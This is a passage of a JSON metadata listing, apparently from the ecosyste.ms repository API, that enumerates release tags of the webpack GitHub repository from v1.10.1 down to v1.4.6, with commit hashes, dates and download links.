b/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"